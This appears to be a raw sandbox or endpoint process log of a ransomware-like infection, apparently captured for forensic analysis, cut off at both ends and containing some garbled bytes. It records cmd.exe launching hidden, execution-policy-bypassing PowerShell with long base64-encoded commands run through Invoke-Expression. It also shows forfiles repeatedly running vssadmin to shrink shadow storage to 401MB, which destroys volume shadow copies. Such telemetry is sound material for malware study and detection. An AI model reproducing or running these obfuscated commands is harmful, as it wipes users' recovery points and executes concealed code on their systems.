A1AHQAVQBTAGMAcgBKADIARQByAEoAeQBzAG4AYQAxAEUAdwBKAHkAcwBuAFYARABGAG0ATgAwAGwAUABjADMARgBhAEoAeQBzAG4AUwB5AGMAcgBKADMARgBhAGUAQwBjAHIASgAwAGcAMQBkAFUAYwBuAEsAeQBkADMAWgBtAHgAcQBUAHoAbABTAE4AawBFAG4ASwB5AGMAMgBiAEYAZwBuAEsAeQBkADQAYgBTAGMAcgBKADEARgAwAFkAUwBjAHIASgAxAGwAaABiAEMAYwByAEoAMgBKAE4AVABtAFEAbgBLAHkAZABDAEoAeQBzAG4ATgBGAGQATQBiAGsARgAwAFIAUwBjAHIASgAxAFoAUgBOAEQAQQBuAEsAeQBkAHAAWQBTAHMAdwBRAGkAYwByAEoAMgBjAG4ASwB5AGQATgBjAEcATQByAFEAMgBSAHUAVwBVAFUAbgBLAHkAZABpAGIAVwBJAHYASgB5AHMAbgBRAHoARgBCAGQAVwBSAFAASgB5AHMAbgBVAEcAeAAyAFEAVwBKAHAAYgAyAFIAQwBkAEgAVgBIAFkAagBOAHAAUwBFAE0AbgBLAHkAZABVAFoARABkADUAYgBsAEoAeQBUAGkAYwByAEoAMABSAEkASgB5AHMAbgBiAGkAdAB0AFQAVQAxADMAZQBUAFYAWABiAGsAOQBMAFUAMgB4ADQAZAAzAHAAcwBKAHkAcwBuAFUAWABWADYAYwAyAHgAVwBWAEgAZABNAEoAeQBzAG4AVABFAHcAcgBRAFgAYwA5AFAAWABzAHcAZgBTAEEAcABMAEYAdABwAGIAeQA1AGoAVAB5AGMAcgBKADAAMQBRAFUAawBWAFQAVQAyAGwAdgBiAGkANQBEAEoAeQBzAG4AVAAwADAAbgBLAHkAZABRAGMAawBWAFQAVQB5AGMAcgBKADAAawBuAEsAeQBkAFAAYgBrADEAUABSAEcAVgBkAE8AaQBjAHIASgB6AHAARQBaAFUATgBQAEoAeQBzAG4AYgBWAEIAUwBSAFYATgB6AEkAQwBjAHIASgB5AGsAZwBLAFMAYwByAEoAeQBBAHMAVwAzAFIAbABXAEgAUQB1AFIAVQA1AGoAVAAyAFIAcABiAGsAZABkAE8AaQBjAHIASgB6AHAAaABjADIATgBwAGEAUwBrAHAATABsAEoAbABZAFcAUgBVAFQAMgBWAE8AWgBDAGcAZwBLAFMAQQBuAEsAUwBBAHQAUgBpAEIAYgBRADIAaABCAGMAbAAwAHoATwBTAHgAYgBRADIAaABCAGMAbAAwAHoATgBpAGwAOABJAEcAbABPAFYAawA5AEwAWgBTADEARgBlAEYAQgB5AFIAVgBOAFQAYQBXADkAdQAiAA0ACgAkAGgAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnACkAKQANAAoASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABoAA==
옚Zď༾䏈�ď༮䏈\
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
59
4588
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABpAD0AIgBLAEMAZwBuAEsAQwBCAHUAWgBYAGMAdABiADAASQBuAEsAeQBkAEsAWgBVAE4AMABJAEcAbABQAEoAeQBzAG4ATABtAE4AUABiAFgAQgB5AFIAVgBOAFQAUwBXADkATwBMAGkAYwByAEoAMgBSAGwAUgBpAGMAcgBKADIAeABoAGQARQBVAG4ASwB5AGQAVABWAEYASgBGAFkAVwAwAG8ASQBGAHQASgBUAHkANQBOAFIAVwAxAHYAVQBuAGwAVABkAEMAYwByAEoAMwBKAEYAUQBVADEAZABXADEATQBuAEsAeQBkADUASgB5AHMAbgBjAHkAYwByAEoAMQBSAEYAVABTADUAagBiADAANABuAEsAeQBkADIAUgBWAEoAVQBYAFMAYwByAEoAegBvAG4ASwB5AGMANgBaAG4ASQBuAEsAeQBkAHYAYgBTAGMAcgBKADAASgBCAFUAMABVADIATgBDAGMAcgBKADMATgAwAGMAbQBsAHUAUgB5AGcAZwBSAEcAcwBuAEsAeQBkAHAAUwBGAGsAegBaAEUATgB6AEoAeQBzAG4AUwBYAGQARQBTAFYAWgBtAFMAbQBZAG4ASwB5AGQAVQBRADIASgB4AFEAbgBVAG4ASwB5AGMANQBaAEMAOQBDAFkAbgBKADYATQAwAGwAagBjAFYAZABoAFkAeQBjAHIASgAwAGQAMABNAEUAbAB4AFQAMgBoAGkAZQBTAGMAcgBKAHoAZABwAFUAbQBOAHUAZQBWAEYAcgBOAFMAYwByAEoAMQBnAHgAWQBVAFoAdgBVAGoASgBVAFcAVABsAHYAZQBqAEYAWABlAEcAZABOAE8AVwBrADQAZQBGAEkAbgBLAHkAZAB1AGQARABKAHIASgB5AHMAbgBZAGwASgBKAFIAUwBjAHIASgAzAEEAbgBLAHkAZABFAFoAVQB0AEYAZABHADkAaQBKAHkAcwBuAFEAbABaAHcASgB5AHMAbgBPAEQATQBuAEsAeQBkAHYAYwBpAGMAcgBKADEAWgBPAFMAbgBwAEYAYgBqAFoAeABiAEUAZwBuAEsAeQBkAEcAUwBFAHAAcQBKAHkAcwBuAFQAMwBOAHgAYwBpADgAbgBLAHkAZAAzAFEAMQBBAG4ASwB5AGQAVQBhAFcAVQBuAEsAeQBkAHUAUQAxAEoAdwBRAGwAQQBuAEsAeQBjAHoAZAAzAFIAdgBWAGsAOQBuAE0AMwBZAHkASgB5AHMAbgBVAEMAYwByAEoAMwBsAEUATgBGAEoATABXAEMAYwByAEoAMABSAG0ATQBtADkARwBPAFcAbABoAEoAeQBzAG4AZABsAGQAcQBiAGoATQBuAEsAeQBkAE8AVwBYAE4ARQBNADAAbABYAFQASABVADMASgB5AHMAbgBNAFUARgBoAGMAVQA5AE0AVwBGAGsAbgBLAHkAYwAyAEoAeQBzAG4AVABrAFoATwBkAEUATgBDAGEAMgBGAFMAYwBuAFIANABlAGsASgBDAFUAWABJAG4ASwB5AGQAVwBRAGwAWgA0AE0AVABoAGoASgB5AHMAbgBkAG0ARQBuAEsAeQBjAHkATAAwAEYARgBKAHkAcwBuAFAAVQBSAHIASgB5AHMAbgBhAFMAQQBuAEsAeQBjAHAASQBDAHgAYgBjADMAawBuAEsAeQBkAHoAZABHAFYATgBKAHkAcwBuAEwAbQBsAHYATABtAE4AUABKAHkAcwBuAGIAUwBjAHIASgAxAEIAUwBSAFYATgBUAGEAUwBjAHIASgAwADkAdQBMAG0ATgBQAGIAUwBjAHIASgAxAEIAUwBaAFYATgB6AFMAVQA5AE8AYgBXADkAawBaAFYAMAA2AE8AbQBRAG4ASwB5AGQAbABZADIAOQB0AEoAeQBzAG4AVQBGAEoARgBVADEATQBnAEsAUwBjAHIASgAxAFYAagBlAEMAQgBtAGIAMQBKAEYAUQBXAE4ASQBKAHkAcwBuAEkASABzAGcAYgBtAFYAMwBKAHkAcwBuAEwAVwA5AEMAUwBtAFYARABkAEMAQgBKAFQAeQBjAHIASgB5ADUAegBkAEYASgBGAFkAVQAxAHkAWgBXAEYAawBaAFYASQBvAGQAMwBsAHEAWAB5AEEAcwBKAHkAcwBuAFcAMQBOAFoAVQAzAFIAbABUAFMANQAwAFIAWABoAFUATABpAGMAcgBKADIAVgBPAFEAMgA5AGsASgB5AHMAbgBhAFcANQBIAFgAUwBjAHIASgB6AG8ANgBRAFYATQBuAEsAeQBkAEQAYQBVAGsAbgBLAHkAYwBnAEsAWAAwAG4ASwB5AGMAZwBKAHkAcwBuAFYAVwBOADQAUgBrADkAeQBaAFUARgBqAEoAeQBzAG4AYQBIAHMAbgBLAHkAYwBnAGQAMwBsAHEAWAB5ADUAUwBSAFMAYwByAEoAMgBGAGsAZABFADgAbgBLAHkAZABGAFQAbQBRAG4ASwB5AGMAbwBLAFMAYwByAEoAeQBCADkASwBWAFYAagBlAEMAQQB1AEsAQwBCADMASgB5AHMAbgBlAFMAYwByAEoAMgBwAFcAWgBWAEoAQwBKAHkAcwBuAFQAeQBjAHIASgAzAE4ARgBjAEYASgBGAEoAeQBzAG4AWgBpAGMAcgBKADAAVgBTAFoAVwA1AEQAWgBTADQAbgBLAHkAZABVAFQAMQBOADAAVQBtAGwAdQBKAHkAcwBuAFIAeQBnAHAAVwB6AEUAcwBNADEAMABuAEsAeQBjAHIAUgBDAGMAcgBKADIAdABwAFcARQBSAHIAYQBTADEAcQBUADAAbABPAFIAQwBjAHIASgAyAHQAcABSAEcAdABwAEsAUwBjAHAASQBDADEAagBjAG0AVgB3AFQARwBGAGoAUgBTAEEAbgBkADMAbABxAEoAeQB4AGIAWQAyAGgAaABjAGwAMAB6AE4AaQAxAGoAYwBtAFYAdwBUAEcARgBqAFIAUwBBAGcASwBGAHQAagBhAEcARgB5AFgAVABZADQASwAxAHQAagBhAEcARgB5AFgAVABFAHcATgB5AHQAYgBZADIAaABoAGMAbAAwAHgATQBEAFUAcABMAEYAdABqAGEARwBGAHkAWABUAE0ANQBJAEMAQQB0AFUAawBWAHcAVABHAEYAagBSAFMAQQBvAFcAMgBOAG8AWQBYAEoAZABPAEQAVQByAFcAMgBOAG8AWQBYAEoAZABPAFQAawByAFcAMgBOAG8AWQBYAEoAZABNAFQASQB3AEsAUwB4AGIAWQAyAGgAaABjAGwAMAB4AE0AagBRAHAAZgBDADQAZwBLAEMAQQBrAFUARgBOAG8AYgAwADEARgBXAHoAUgBkAEsAeQBSAFEAVQAyAGgAdgBUAFcAVgBiAE0AegBSAGQASwB5AGQAWQBKAHkAawA9ACIADQAKACQAagAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQB0AGYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGkAKQApAA0ACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGoA
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
60
3848
powershell.exe
4588
powershell.exe
PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABpAD0AIgBLAEMAZwBuAEsAQwBCAHUAWgBYAGMAdABiADAASQBuAEsAeQBkAEsAWgBVAE4AMABJAEcAbABQAEoAeQBzAG4ATABtAE4AUABiAFgAQgB5AFIAVgBOAFQAUwBXADkATwBMAGkAYwByAEoAMgBSAGwAUgBpAGMAcgBKADIAeABoAGQARQBVAG4ASwB5AGQAVABWAEYASgBGAFkAVwAwAG8ASQBGAHQASgBUAHkANQBOAFIAVwAxAHYAVQBuAGwAVABkAEMAYwByAEoAMwBKAEYAUQBVADEAZABXADEATQBuAEsAeQBkADUASgB5AHMAbgBjAHkAYwByAEoAMQBSAEYAVABTADUAagBiADAANABuAEsAeQBkADIAUgBWAEoAVQBYAFMAYwByAEoAegBvAG4ASwB5AGMANgBaAG4ASQBuAEsAeQBkAHYAYgBTAGMAcgBKADAASgBCAFUAMABVADIATgBDAGMAcgBKADMATgAwAGMAbQBsAHUAUgB5AGcAZwBSAEcAcwBuAEsAeQBkAHAAUwBGAGsAegBaAEUATgB6AEoAeQBzAG4AUwBYAGQARQBTAFYAWgBtAFMAbQBZAG4ASwB5AGQAVQBRADIASgB4AFEAbgBVAG4ASwB5AGMANQBaAEMAOQBDAFkAbgBKADYATQAwAGwAagBjAFYAZABoAFkAeQBjAHIASgAwAGQAMABNAEUAbAB4AFQAMgBoAGkAZQBTAGMAcgBKAHoAZABwAFUAbQBOAHUAZQBWAEYAcgBOAFMAYwByAEoAMQBnAHgAWQBVAFoAdgBVAGoASgBVAFcAVABsAHYAZQBqAEYAWABlAEcAZABOAE8AVwBrADQAZQBGAEkAbgBLAHkAZAB1AGQARABKAHIASgB5AHMAbgBZAGwASgBKAFIAUwBjAHIASgAzAEEAbgBLAHkAZABFAFoAVQB0AEYAZABHADkAaQBKAHkAcwBuAFEAbABaAHcASgB5AHMAbgBPAEQATQBuAEsAeQBkAHYAYwBpAGMAcgBKADEAWgBPAFMAbgBwAEYAYgBqAFoAeABiAEUAZwBuAEsAeQBkAEcAUwBFAHAAcQBKAHkAcwBuAFQAMwBOAHgAYwBpADgAbgBLAHkAZAAzAFEAMQBBAG4ASwB5AGQAVQBhAFcAVQBuAEsAeQBkAHUAUQAxAEoAdwBRAGwAQQBuAEsAeQBjAHoAZAAzAFIAdgBWAGsAOQBuAE0AMwBZAHkASgB5AHMAbgBVAEMAYwByAEoAMwBsAEUATgBGAEoATABXAEMAYwByAEoAMABSAG0ATQBtADkARwBPAFcAbABoAEoAeQBzAG4AZABsAGQAcQBiAGoATQBuAEsAeQBkAE8AVwBYAE4ARQBNADAAbABYAFQASABVADMASgB5AHMAbgBNAFUARgBoAGMAVQA5AE0AVwBGAGsAbgBLAHkAYwAyAEoAeQBzAG4AVABrAFoATwBkAEUATgBDAGEAMgBGAFMAYwBuAFIANABlAGsASgBDAFUAWABJAG4ASwB5AGQAVwBRAGwAWgA0AE0AVABoAGoASgB5AHMAbgBkAG0ARQBuAEsAeQBjAHkATAAwAEYARgBKAHkAcwBuAFAAVQBSAHIASgB5AHMAbgBhAFMAQQBuAEsAeQBjAHAASQBDAHgAYgBjADMAawBuAEsAeQBkAHoAZABHAFYATgBKAHkAcwBuAEwAbQBsAHYATABtAE4AUABKAHkAcwBuAGIAUwBjAHIASgAxAEIAUwBSAFYATgBUAGEAUwBjAHIASgAwADkAdQBMAG0ATgBQAGIAUwBjAHIASgAxAEIAUwBaAFYATgB6AFMAVQA5AE8AYgBXADkAawBaAFYAMAA2AE8AbQBRAG4ASwB5AGQAbABZADIAOQB0AEoAeQBzAG4AVQBGAEoARgBVADEATQBnAEsAUwBjAHIASgAxAFYAagBlAEMAQgBtAGIAMQBKAEYAUQBXAE4ASQBKAHkAcwBuAEkASABzAGcAYgBtAFYAMwBKAHkAcwBuAEwAVwA5AEMAUwBtAFYARABkAEMAQgBKAFQAeQBjAHIASgB5ADUAegBkAEYASgBGAFkAVQAxAHkAWgBXAEYAawBaAFYASQBvAGQAMwBsAHEAWAB5AEEAcwBKAHkAcwBuAFcAMQBOAFoAVQAzAFIAbABUAFMANQAwAFIAWABoAFUATABpAGMAcgBKADIAVgBPAFEAMgA5AGsASgB5AHMAbgBhAFcANQBIAFgAUwBjAHIASgB6AG8ANgBRAFYATQBuAEsAeQBkAEQAYQBVAGsAbgBLAHkAYwBnAEsAWAAwAG4ASwB5AGMAZwBKAHkAcwBuAFYAVwBOADQAUgBrADkAeQBaAFUARgBqAEoAeQBzAG4AYQBIAHMAbgBLAHkAYwBnAGQAMwBsAHEAWAB5ADUAUwBSAFMAYwByAEoAMgBGAGsAZABFADgAbgBLAHkAZABGAFQAbQBRAG4ASwB5AGMAbwBLAFMAYwByAEoAeQBCADkASwBWAFYAagBlAEMAQQB1AEsAQwBCADMASgB5AHMAbgBlAFMAYwByAEoAMgBwAFcAWgBWAEoAQwBKAHkAcwBuAFQAeQBjAHIASgAzAE4ARgBjAEYASgBGAEoAeQBzAG4AWgBpAGMAcgBKADAAVgBTAFoAVwA1AEQAWgBTADQAbgBLAHkAZABVAFQAMQBOADAAVQBtAGwAdQBKAHkAcwBuAFIAeQBnAHAAVwB6AEUAcwBNADEAMABuAEsAeQBjAHIAUgBDAGMAcgBKADIAdABwAFcARQBSAHIAYQBTADEAcQBUADAAbABPAFIAQwBjAHIASgAyAHQAcABSAEcAdABwAEsAUwBjAHAASQBDADEAagBjAG0AVgB3AFQARwBGAGoAUgBTAEEAbgBkADMAbABxAEoAeQB4AGIAWQAyAGgAaABjAGwAMAB6AE4AaQAxAGoAYwBtAFYAdwBUAEcARgBqAFIAUwBBAGcASwBGAHQAagBhAEcARgB5AFgAVABZADQASwAxAHQAagBhAEcARgB5AFgAVABFAHcATgB5AHQAYgBZADIAaABoAGMAbAAwAHgATQBEAFUAcABMAEYAdABqAGEARwBGAHkAWABUAE0ANQBJAEMAQQB0AFUAawBWAHcAVABHAEYAagBSAFMAQQBvAFcAMgBOAG8AWQBYAEoAZABPAEQAVQByAFcAMgBOAG8AWQBYAEoAZABPAFQAawByAFcAMgBOAG8AWQBYAEoAZABNAFQASQB3AEsAUwB4AGIAWQAyAGgAaABjAGwAMAB4AE0AagBRAHAAZgBDADQAZwBLAEMAQQBrAFUARgBOAG8AYgAwADEARgBXAHoAUgBkAEsAeQBSAFEAVQAyAGgAdgBUAFcAVgBiAE0AegBSAGQASwB5AGQAWQBKAHkAawA9ACIADQAKACQAagAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQB0AGYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGkAKQApAA0ACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGoA
C:\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
61
5032
forfiles.exe
3848
forfiles.exe
"C:\WINDOWS\system32\forfiles.exe" /c "cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB"
C:\
c:\windows\syswow64\forfiles.exe
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Process
62
4620
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
63
2920
vssadmin.exe
4620
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
64
3780
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
65
4636
vssadmin.exe
3780
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
66
5036
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
67
4660
vssadmin.exe
5036
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
68
2148
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
69
4904
vssadmin.exe
2148
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
70
2740
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
71
3456
vssadmin.exe
2740
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
72
3480
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
73
4884
vssadmin.exe
3480
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
74
4484
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
75
952
vssadmin.exe
4484
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
76
4908
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
77
840
vssadmin.exe
4908
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
78
1608
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
79
900
vssadmin.exe
1608
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
80
4944
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
81
3944
vssadmin.exe
4944
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
82
1752
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
83
240
vssadmin.exe
1752
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
84
4520
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
85
3448
vssadmin.exe
4520
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
86
4820
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
87
916
vssadmin.exe
4820
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
88
3064
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
89
4924
vssadmin.exe
3064
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
90
4556
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
91
768
vssadmin.exe
4556
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
92
1440
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
93
3328
vssadmin.exe
1440
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
94
4988
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
95
5092
vssadmin.exe
4988
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
96
4640
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
97
4576
vssadmin.exe
4640
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
98
1380
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
99
4392
vssadmin.exe
1380
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
100
3552
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
101
1272
vssadmin.exe
3552
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
102
700
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
103
3288
vssadmin.exe
700
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
104
3428
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
105
4940
vssadmin.exe
3428
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
106
4008
cmd.exe
5032
cmd.exe
/c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
107
3576
vssadmin.exe
4008
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
108
1360
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABrAD0AIgBLAEMAYwBnAEoAeQBzAG4ASgBpAGcAbgBLAHkAYwBnAE8ASABoAHkAYwB5AGMAcgBKADIAZwBuAEsAeQBkAGwAVABHAHcAbgBLAHkAZABKAFoARgBzAG4ASwB5AGMAeABYAFMAcwBuAEsAeQBjADQAZQBDAGMAcgBKADMASgBUAGEARQBVAG4ASwB5AGQATQBKAHkAcwBuAFQARwBsAEUAVwB6AEUAbgBLAHkAYwB6AFgAUwB0AGgAYgBWAGsAbgBLAHkAZABZAEoAeQBzAG4AWQBTAGMAcgBKADIAMQBaAEsAUwBjAHIASgB5AGcAbgBLAHkAYwBnAGIAawBWADMATABVADgAbgBLAHkAZABpAEoAeQBzAG4AUwBtAFYARABkAEMAQQBnAFMAUwBjAHIASgAwADgAdQBKAHkAcwBuAFEAMgA5AE4ASgB5AHMAbgBVAEgASgBsAGMAeQBjAHIASgAzAE4ASgBUAHkAYwByAEoAMgA0AHUAWgBFAFYAbQBKAHkAcwBuAGIARwBFAG4ASwB5AGQAMABKAHkAcwBuAFoAVgBOADAAYwBrAFYAaABKAHkAcwBuAGIAUwBnAG4ASwB5AGMAZwBXADIAbAB2AEwAawAxAGwAYgBVADkAeQBlAFgATgBVAFUAbQBWAGgAYgBWADEAYgBKAHkAcwBuAFkAMgA4AG4ASwB5AGQAdQBWAGsAVgB5AFYAQwBjAHIASgAxADAANgBPAGkAYwByAEoAMgBZAG4ASwB5AGQAUwBUADIAMQBpAFEAUwBjAHIASgAxAE4AbABKAHkAcwBuAE4AagBRAG4ASwB5AGQAegBKAHkAcwBuAFYASABJAG4ASwB5AGQAcABiAGsAYwBvAEkARwBFAG4ASwB5AGQAdABXAFUAaABWAE4AMQBKAEUAYgB5AGMAcgBKADAAbAAzAFIARgBCADUASgB5AHMAbgBWAG0AaABhAEoAeQBzAG4AWgBFAEoAdgBjADMAbABvAFMAWABCAE0ASgB5AHMAbgBkAHkAYwByAEoAMAAxAGoAWgB6AEoASwBXAGkAYwByAEoAMABVAG4ASwB5AGQAMABKAHkAcwBuAFcAUwBjAHIASgAyAEUAbgBLAHkAZABMAFIAUwBjAHIASgAzAEIAbQBMADMAVQBuAEsAeQBkAHMAVwBXAFUAMwBXAEgAUgB5AFoAWABRAG4ASwB5AGQAWABWAHkAYwByAEoAMgBWAE